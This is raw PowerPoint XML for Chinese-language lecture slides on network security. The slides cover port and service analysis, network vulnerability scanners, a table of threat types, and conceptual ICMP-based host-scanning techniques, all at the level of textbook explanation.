              <a:t>服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>主机有应答就说明主机提供了这个服务，开放了这个端口的服务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>网络扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>软件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>目标主机一定范围的端口进行扫描。这样可以全部掌握目标主机的端口情况。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165890" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>端口、服务分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4D45FE2D-6386-4DCB-9242-98E6F439C7F8}" type="slidenum">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mtClean="0"/>
              <a:t>网络扫描器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>自动检测远程或本地系统安全性弱点（漏洞）的程序。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>安全评估工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>系统管理员保障系统安全的有效工具，目标可以是工作站、服务器、交换机、数据库应用等各种对象。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络漏洞扫描器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络入侵者收集信息的重要手段</a:t>
            </a:r>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523C96D-6DA9-461B-9F2C-A918FEAD4B6F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276482" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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457200" y="1481138"/>
          <a:ext cx="8229600" cy="4324124"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{D7AC3CCA-C797-4891-BE02-D94E43425B78}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4114800"/>
                <a:gridCol w="4114800"/>
              </a:tblGrid>
              <a:tr h="617732">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
                        <a:t>（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
                        <a:t>）假冒</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" smtClean="0"/>
                        <a:t>（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" smtClean="0"/>
                        <a:t>8</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" smtClean="0"/>
                        <a:t>）业务流量、流向分析 </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="617732">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
                        <a:t>（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
                        <a:t>）未授权访问</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"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9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" smtClean="0"/>
                        <a:t>）隐蔽信道 </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="617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t>（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
                        <a:t>）拒绝服务（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
                        <a:t>DoS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
                        <a:t>）</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10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" smtClean="0"/>
                        <a:t>）人为失误</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="617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t>（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
                        <a:t>4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
                        <a:t>）否认（抵赖）</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11</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" smtClean="0"/>
                        <a:t>）自然灾害与人为破坏 </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="617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t>（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
                        <a:t>5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
                        <a:t>）窃听</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12</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" smtClean="0"/>
                        <a:t>）后门（陷门）</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="617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t>（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
                        <a:t>6</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
                        <a:t>）篡改</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13</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" smtClean="0"/>
                        <a:t>）恶意代码</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="61773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t>（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
                        <a:t>7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
                        <a:t>）复制与重放（重演）</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"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smtClean="0"/>
                        <a:t>（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" smtClean="0"/>
                        <a:t>14</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" smtClean="0"/>
                        <a:t>）不良信息</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>威胁的表现形式 </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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>扫描目标主机识别其工作状态（开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>关机）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>识别目标主机端口的状态（监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>关闭）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>识别目标主机系统及服务程序的类型和版本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>根据已知漏洞信息，分析系统脆弱点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>生成扫描结果报告</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280578" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络扫描器的主要功能</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65623B0F-72DA-431B-8455-F749A3BF1958}"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扫描器的基本工作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>投石问路</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 3" descr="ss copy"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763688" y="2109559"/>
            <a:ext cx="5544616" cy="4343777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主机扫描技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>端口扫描技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303106" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络扫描的主要技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BFEA957B-286F-4DB3-A77A-94EBDF543A73}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目的：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>确定在目标网络上的主机是否可达</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>常用的传统扫描手段有：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ICMP Echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>扫描</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ICMP Sweep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>扫描</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Broadcast ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Non-Echo ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305154" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>主机扫描技术－传统技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C8802DBC-8478-4680-B6D2-D7FC611D2A28}"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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0"/>
              <a:t>ICMP echo——Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>优点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>：简单，系统支持</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>缺点：很容易被防火墙限制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>ICMP Sweep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0"/>
              <a:t>扫描：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>通过并行发送，同时探测多个目标主机，以提高探测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>效率</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>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3442031-7331-4481-BD9C-405DDE3F7FD2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307202" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>sweep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1870075"/>
            <a:ext cx="8435975" cy="4530725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP ECHO request</a:t>
            </a:r>
            <a:r>
